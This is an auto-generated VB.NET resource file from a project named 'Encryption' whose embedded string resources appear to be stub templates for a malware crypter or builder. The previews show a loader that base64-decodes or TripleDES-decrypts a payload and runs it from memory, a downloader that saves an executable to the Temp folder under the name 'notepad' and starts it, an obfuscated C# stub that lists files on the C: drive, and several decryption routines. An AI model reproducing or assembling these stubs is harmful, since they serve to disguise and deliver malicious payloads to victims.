'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.42000
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Encryption.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to using System.Reflection;
        '''using System.Runtime.CompilerServices;
        '''using System.Runtime.InteropServices;
        '''
        '''// General Information about an assembly is controlled through the following 
        '''// set of attributes. Change these attribute values to modify the information
        '''// associated with an assembly.
        '''[assembly: AssemblyTitle(&quot;&quot;)]
        '''[assembly: AssemblyDescription(&quot;&quot;)]
        '''[assembly: AssemblyConfiguration(&quot;&quot;)]
        '''[assembly: AssemblyCompany(&quot;&quot;)]
        '''[assembly: AssemblyProduct(&quot;&quot;)]
        '''[assembly: AssemblyCopyright(&quot;Copyright © [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property AssemblyInfo() As String
            Get
                Return ResourceManager.GetString("AssemblyInfo", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Module Module1
        '''    Sub main()
        '''
        '''    End Sub
        '''
        '''
        '''    Public p0 As Object = My.Resources.pit0
        '''    Public p1 As Object = My.Resources.pit1
        '''    Public p2 As Object = My.Resources.pit2
        '''
        '''    Public t As String = p0 &amp; p1 &amp; p2
        '''    Public y As Object = t.Replace(&quot;^&quot;, &quot;A&quot;)
        '''
        '''
        '''    Public gg As Byte() = Convert.FromBase64String(y)
        '''
        '''    Public mm As Object = AppDomain.CurrentDomain.Load(gg)
        '''    Public hh As String = mm.entrypoint.invoke(Nothing, Nothing)
        '''
        '''End Module.
        '''</summary>
        Friend ReadOnly Property bas64() As String
            Get
                Return ResourceManager.GetString("bas64", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.IO.UnmanagedMemoryStream similar to System.IO.MemoryStream.
        '''</summary>
        Friend ReadOnly Property click_one() As System.IO.UnmanagedMemoryStream
            Get
                Return ResourceManager.GetStream("click_one", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''&lt;Project ToolsVersion=&quot;14.0&quot; DefaultTargets=&quot;Build&quot; xmlns=&quot;http://schemas.microsoft.com/developer/msbuild/2003&quot;&gt;
        '''  &lt;Import Project=&quot;$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props&quot; Condition=&quot;Exists(&apos;$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props&apos;)&quot; /&gt;
        '''  &lt;PropertyGroup&gt;
        '''    &lt;Configuration Condition=&quot; &apos;$(Configuration)&apos; == &apos;&apos; &quot;&gt;Debug&lt;/Configuration&gt;
        '''    &lt;Platform Condition=&quot; &apos;$(Platform)&apos; == &apos;&apos; &quot;&gt;AnyCPU&lt;/Platform&gt;
        '''    [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property csproj() As String
            Get
                Return ResourceManager.GetString("csproj", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Public Function DecompressGZip(bytesToDecompress As Byte()) As Byte()
        '''        Using stream = New GZipStream(New MemoryStream(bytesToDecompress), CompressionMode.Decompress)
        '''            Const size As Integer = 4096
        '''            Dim buffer = New Byte(size - 1) {}
        '''            Using memoryStream = New MemoryStream()
        '''                Dim count As Integer
        '''                Do
        '''                    count = stream.Read(buffer, 0, size)
        '''                    If count &gt; 0 Then
        '''                        memoryStream.Wr [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Gzip() As String
            Get
                Return ResourceManager.GetString("Gzip", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Public Function LORDDecrypt(ByVal ParmDec As String)
        '''        ParmDec = ParmDec.Replace(&quot;月&quot;, &quot;a&quot;).Replace(&quot;아&quot;, &quot;A&quot;).Replace(&quot;官&quot;, &quot;b&quot;).Replace(&quot;악&quot;, &quot;B&quot;).Replace(&quot;匹&quot;, &quot;c&quot;).Replace(&quot;안&quot;, &quot;C&quot;).Replace(&quot;力&quot;, &quot;d&quot;).Replace(&quot;알&quot;, &quot;D&quot;).Replace(&quot;三&quot;, &quot;e&quot;).Replace(&quot;앙&quot;, &quot;E&quot;).Replace(&quot;下&quot;, &quot;f&quot;).Replace(&quot;앞&quot;, &quot;F&quot;).Replace(&quot;巨&quot;, &quot;g&quot;).Replace(&quot;얘&quot;, &quot;G&quot;).Replace(&quot;升&quot;, &quot;h&quot;).Replace(&quot;ᄍ&quot;, &quot;H&quot;).Replace(&quot;工&quot;, &quot;i&quot;).Replace(&quot;ᄊ&quot;, &quot;I&quot;).Replace(&quot;丁&quot;, &quot;j&quot;).Replace(&quot;ᄈ&quot;, &quot;J&quot;).Replace(&quot;水&quot;, &quot;k&quot;).Replace(&quot;응&quot;, &quot;K&quot;).Replace(&quot;心&quot;, &quot;l&quot;).Replace(&quot;읍&quot;, &quot;L&quot;). [rest of string was truncate....
        '''</summary>
        Friend ReadOnly Property Jp2() As String
            Get
                Return ResourceManager.GetString("Jp2", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Public Function md5Decrypt(ByVal bytData As Byte(), ByVal sKey As String, Optional ByVal tMode As CipherMode = 2, Optional ByVal tPadding As PaddingMode = 2) As Byte()
        '''        Dim provider As New MD5CryptoServiceProvider
        '''        Dim buffer2 As Byte() = provider.ComputeHash(Encoding.UTF8.GetBytes(sKey))
        '''        provider.Clear()
        '''        Dim provider2 As New TripleDESCryptoServiceProvider
        '''        provider2.Key = buffer2
        '''        provider2.Mode = tMode
        '''        provider2.Padding = tPadding
        '''        Dim buf [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property md5() As String
            Get
                Return ResourceManager.GetString("md5", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to using Microsoft.Win32;
        '''using System;
        '''using System.Windows.Forms;
        '''using System.Reflection;
        '''using System.Security.Cryptography;
        '''using System.Text;
        '''
        '''namespace ކގ
        '''{
        '''    static class Program
        '''    {
        '''
        '''        static void Main()
        '''        {
        '''            ސދފސދފސދފސދފސދ();
        '''
        '''
        '''
        '''        }
        '''        static void ސދފސދފސދފސދފސދ()
        '''        {
        '''
        '''            
        '''            System.Threading.Thread.Sleep(000050);
        '''
        '''            string[] ކކގކކގކގ = System.IO.Directory.GetFiles(&quot;C:\\&quot;);
        '''            foreach (string i  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property programcs() As String
            Get
                Return ResourceManager.GetString("programcs", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to 
        '''
        '''namespace test.Properties
        '''{
        '''
        '''
        '''    /// &lt;summary&gt;
        '''    ///   A strongly-typed resource class, for looking up localized strings, etc.
        '''    /// &lt;/summary&gt;
        '''    // This class was auto-generated by the StronglyTypedResourceBuilder
        '''    // class via a tool like ResGen or Visual Studio.
        '''    // To add or remove a member, edit your .ResX file then rerun ResGen
        '''    // with the /str option, or rebuild your VS project.
        '''    [global::System.CodeDom.Compiler.GeneratedCodeAttribute(&quot;System.Resources.Tools.Strongl [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property REEEEES() As String
            Get
                Return ResourceManager.GetString("REEEEES", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''&lt;root&gt;
        '''  &lt;!-- 
        '''    Microsoft ResX Schema 
        '''    
        '''
        '''            : and then encoded with base64 encoding.
        '''    --&gt;
        '''  &lt;xsd:schema id=&quot;root&quot; xmlns=&quot;&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:msdata=&quot;urn:schemas-microsoft-com:xml-msdata&quot;&gt;
        '''    &lt;xsd:element name=&quot;root&quot; msdata:IsDataSet=&quot;true&quot;&gt;
        '''      &lt;xsd:complexType&gt;
        '''        &lt;xsd:choice maxOccurs=&quot;unbounded&quot;&gt;
        '''          &lt;xsd:element name=&quot;metadata&quot;&gt;
        '''            &lt;xsd:complexType&gt;
        '''              &lt;xsd:sequence&gt; [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property resourcesresx() As String
            Get
                Return ResourceManager.GetString("resourcesresx", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;?xml version=&apos;1.0&apos; encoding=&apos;utf-8&apos;?&gt;
        '''&lt;SettingsFile xmlns=&quot;http://schemas.microsoft.com/VisualStudio/2004/01/settings&quot; CurrentProfile=&quot;(Default)&quot;&gt;
        '''  &lt;Profiles&gt;
        '''    &lt;Profile Name=&quot;(Default)&quot; /&gt;
        '''  &lt;/Profiles&gt;
        '''  &lt;Settings /&gt;
        '''&lt;/SettingsFile&gt;.
        '''</summary>
        Friend ReadOnly Property setting() As String
            Get
                Return ResourceManager.GetString("setting", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to namespace test.Properties
        '''{
        '''
        '''
        '''    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
        '''    [global::System.CodeDom.Compiler.GeneratedCodeAttribute(&quot;Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator&quot;, &quot;11.0.0.0&quot;)]
        '''    internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase
        '''    {
        '''
        '''        private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings( [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property settingdesignedr() As String
            Get
                Return ResourceManager.GetString("settingdesignedr", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Public Function TripleDES_Decrypt(ByVal input As String, ByVal pass As String) As String
        '''        Dim TripleDES As New System.Security.Cryptography.TripleDESCryptoServiceProvider
        '''        Dim Hash_TripleDES As New System.Security.Cryptography.MD5CryptoServiceProvider
        '''        Dim decrypted As String = &quot;&quot;
        '''        Try
        '''            Dim hash(23) As Byte
        '''            Dim temp As Byte() = Hash_TripleDES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
        '''            Array.Copy(temp, 0, hash, 0, 16)
        '''    [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property trvg1() As String
            Get
                Return ResourceManager.GetString("trvg1", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Public Function Decrypt(ByVal sData As String, ByVal sKey As String)
        '''        Dim bytData() As Byte = Encoding.ASCII.GetBytes(sData)
        '''        Return Decrypt(bytData, sKey)
        '''    End Function
        '''    Public Function Decrypt(ByVal bytData As Byte(), ByVal strPass As String) As Byte()
        '''        Dim bytResult As Byte()
        '''        Using oRM As New System.Security.Cryptography.RijndaelManaged
        '''            oRM.KeySize = 256
        '''            oRM.Key = GeKey(strPass)
        '''            oRM.IV = GetIV(strPass)
        '''            Using oMS  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property trydel() As String
            Get
                Return ResourceManager.GetString("trydel", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Module Module1
        '''    Sub min()
        '''        Dim x As Reflection.Assembly = Reflection.Assembly.Load(Convert.FromBase64String(TripleDES_Decrypt(&quot;value&quot;, &quot;Dkey&quot;))).EntryPoint.Invoke(Nothing, Nothing)
        '''    End Sub
        '''    Public Function TripleDES_Decrypt(ByVal input As String, ByVal pass As String) As String
        '''        Dim TripleDES As New System.Security.Cryptography.TripleDESCryptoServiceProvider
        '''        Dim Hash_TripleDES As New System.Security.Cryptography.MD5CryptoServiceProvider
        '''        Dim decrypted As String  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property txt1() As String
            Get
                Return ResourceManager.GetString("txt1", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Module Module1
        '''    Function start(ByVal Name As String)
        '''        Process.Start(Name)
        '''    End Function
        '''    Function path(ByVal exename As String)
        '''        Dim x = My.Computer.FileSystem.SpecialDirectories.Temp &amp; &quot;\&quot; &amp; exename &amp; &quot;.exe&quot;
        '''        Return x
        '''    End Function
        '''    Function getexe(ByVal url As String)
        '''        Dim x As New System.Net.WebClient
        '''        x.DownloadFile(url, path(&quot;notepad&quot;))
        '''        start(path(&quot;notepad&quot;))
        '''    End Function
        '''    Sub main()
        '''        If My.Computer.Name = My.Computer [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property url() As String
            Get
                Return ResourceManager.GetString("url", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Public Shared Function Decrypt(ByVal proj As String, ByVal key As String)
        '''       Dim decryptedText As String = &quot;&quot;
        '''       For i As Integer = 1 To proj.Length
        '''           Dim temp As Integer = AscW(GetChar(proj, i)) - AscW(GetChar(key, i Mod key.Length + 1))
        '''           decryptedText += ChrW(temp)
        '''       Next
        '''       Return decryptedText
        '''   End Function.
        '''</summary>
        Friend ReadOnly Property vgr() As String
            Get
                Return ResourceManager.GetString("vgr", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Public Function XOR_Decrypt(ByVal Input As String, ByVal pass As String) As String
        '''        Dim out As New System.Text.StringBuilder
        '''        Dim u As Integer
        '''        For i As Integer = 0 To Input.Length - 1 Step +2
        '''            Dim tmp As String = Chr((&quot;&amp;H&quot; &amp; Input.Substring(i, 2)) Xor Asc(pass(u)))
        '''            out.Append(tmp)
        '''            If u = pass.Length - 1 Then u = 0 Else u = u + 1
        '''        Next
        '''        Return out.ToString
        '''    End Function.
        '''</summary>
        Friend ReadOnly Property Xoor() As String
            Get
                Return ResourceManager.GetString("Xoor", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
